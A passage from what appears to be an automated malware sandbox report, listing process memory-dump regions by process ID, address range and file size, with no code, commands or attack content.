                                                                                                                                                              56KB

                                                                                                                                                            • memory/5652-1413-0x00000000003B0000-0x00000000003C2000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/5656-1041-0x0000000001230000-0x0000000001248000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              96KB

                                                                                                                                                            • memory/5764-462-0x00000227553F0000-0x00000227554A5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              724KB

                                                                                                                                                            • memory/5764-470-0x0000022755660000-0x000002275567A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              104KB

                                                                                                                                                            • memory/5764-472-0x0000022755640000-0x0000022755646000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              24KB

                                                                                                                                                            • memory/5764-463-0x00000227554B0000-0x00000227554BA000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/5764-471-0x0000022755610000-0x0000022755618000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              32KB

                                                                                                                                                            • memory/5764-461-0x00000227553D0000-0x00000227553EC000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/5764-469-0x0000022755600000-0x000002275560A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/5764-473-0x0000022755650000-0x000002275565A000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/5764-464-0x0000022755620000-0x000002275563C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              112KB

                                                                                                                                                            • memory/5768-789-0x0000000000400000-0x000000000047E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              504KB

                                                                                                                                                            • memory/5768-790-0x0000000000400000-0x000000000047E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              504KB

                                                                                                                                                            • memory/5768-792-0x0000000000400000-0x000000000047E000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              504KB

                                                                                                                                                            • memory/5780-793-0x00007FF7D2150000-0x00007FF7D26E7000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.6MB

                                                                                                                                                            • memory/5976-659-0x00007FF61C350000-0x00007FF61C8E7000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              5.6MB

                                                                                                                                                            • memory/6120-938-0x00000252B0840000-0x00000252B08F5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              724KB